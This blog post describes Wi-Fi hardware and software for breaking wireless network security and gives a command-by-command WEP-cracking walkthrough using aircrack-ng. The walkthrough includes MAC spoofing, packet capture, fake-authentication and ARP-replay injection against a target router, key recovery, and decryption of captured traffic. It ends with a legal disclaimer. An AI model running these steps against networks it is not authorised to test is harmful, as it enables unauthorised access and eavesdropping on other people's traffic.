802.11 Network Security – Tools of the Trade
I thought why not shed some light on the tools that I have been using to play with the Wi-Fi networks around me. Hopefully, we can get gather a collective discussion on what works and what do not and perhaps interesting ideas for future Wi-Fi projects.
Max Chee and I have been toying with 802.11 networks since early this year, we have tested and tried a number of antennas, network adaptors and certain methods to “crack” WEP and WPA. The objective is to decipher and read data that is up in the air.
For starters, here is a set of software/tools that I used.
OS: Backtrack 4, Ubuntu 10.04.
Tools: Aircrack-NG suite, Wireshark & WiFiZoo
Wireshark and WiFiZoo are basically network packet analysers that help you make sense out of streams of data that is being fed to you on a real-time basis. Both have great GUI so I do not foresee any potential problems with regards to using it. Plus it comes pre-installed in Backtrack 4. What one should look out for is mastering the Aircrack-NG suite. What you need to know is that it ONLY works fully with certain Wi-Fi cards. There are certain Wi-Fi cards that will not get detected by the Aircrack-NG suite while others will have only partial functions available (a common example would be able to passively collect data only and not inject packets into the air). What you need to do is to MAKE SURE you get a proper Wi-Fi adaptor card with the correct chipset before you begin cracking or sniffing. You can get the supported list of the cards and chipsets here.
Adaptors & Antennas
This brings us to the fun part of Adaptors and Antennas, perhaps also the hardest and most rewarding part of all. To cut a long story short on the numerous hair-tearing sessions we had to go through finding the “Chosen One”, Max and I finally arrived at two commercially available adaptors that work perfectly with the Aircrack-NG suite. They are as follows:
The reason for these two is simple, its chipset (RTL8187L) is supported and it is cost-effective for their given specifications. The only difference between the two lies within the antenna. The AWUS036H comes with an omnidirectional antenna while the UBDo-gt comes with a directional antenna of 12 dBi gain.
There is significance in applications when choosing between an omnidirectional and a directional antenna. One would use an omnidirectional antenna first when doing reconnaissance on the networks around the vicinity and then a directional antenna to lock-on your target, you can now move away further from your target without compromising signal strength and quality once you know where to point to your target.
Unfortunately, directional antennas do not come cheap. Take the UBDo-gt for an example, because of the antenna it costs about $30-40 SGD more than the AWUS036H and standalone external antennas cost up to $70-90 SGD for about the same 12 dBi gain. The good news is that making your own antenna can be really cheap and simple. I have made a Cantenna on my own using a “Longan Fruit” Can and it gives me about 8 – 12 dBi gain.
Basic steps to get you cracking WEP (for ScriptKiddies)
Once you got your tools ready it is time to get cracking. Routers especially those given out by our local ISP have their default security settings set to WEP to encrypt their traffic. This can be easily cracked by Aircrack-NG suite in about 5 minutes once you are “au fait” with the setup.
For those who want to jump straight into the cracking process here are the basic steps you need to take:
Step 0: Spoof MAC address
sudo ifconfig < attacker’s wlan interface > hw ether <desired MAC address>
Step 1: Gather essential background data about yourself & your target
target_router SSID: target_router
target_router MAC address: 00:14:7F:99:EB:99
target router channel: 6
attacker’s MAC address: 00:0f:b5:ff:ff:f9
attacker’s wlan interface: wlan0
attacker’s monitoring interface name (spawned from wlan0): mon0
Note: Replace the above variables with your own. These were mine for my setup.
Step 2: Using Aircrack-NG suite to crack WEP
Spawn a monitoring interface with wlan0:
sudo airmon-ng start wlan0
Survey/scan for your target router:
sudo airodump-ng mon0
Stop the monitoring interface so that you can start it again to listen on channel 6:
sudo airmon-ng stop mon0 sudo airmon-ng start wlan0 6
Pump output into a file called "outputfile-01.cap":
sudo airodump-ng -c6 -w outputfile mon0
Create a single fakeauth request for every 1 second to generate more IV:
sudo aireplay-ng -1 1 -e target_router -a 00:14:7F:99:EB:99 -h 00:0f:b5:ff:ff:f9 mon0
Launch as many ARP replay to generate IV packets quickly:
sudo aireplay-ng -3 -b 00:14:7F:99:EB:99 -h 00:0f:b5:ff:ff:f9 mon0
sudo aircrack-ng outputfile-01.cap
Step 3 (Optional): Monitor network traffic in real-time
Open up Wireshark > Edit > Preferences > Enter WEP key into the appropriate fields
Disclaimer: Unauthorised access to your neighbours’ network or any other network other than your own is an offence in Singapore. Crack at your own risk!
Finally, experiment as much as you can without getting into trouble with the law because it is a fun process and it need not be a painful one. Please comment and leave your thoughts below. Let us know if you have a Wi-Fi project in mind that you want to try out or you want to share too. I look forward to your response.
Andre Ng, First Mate of Div0.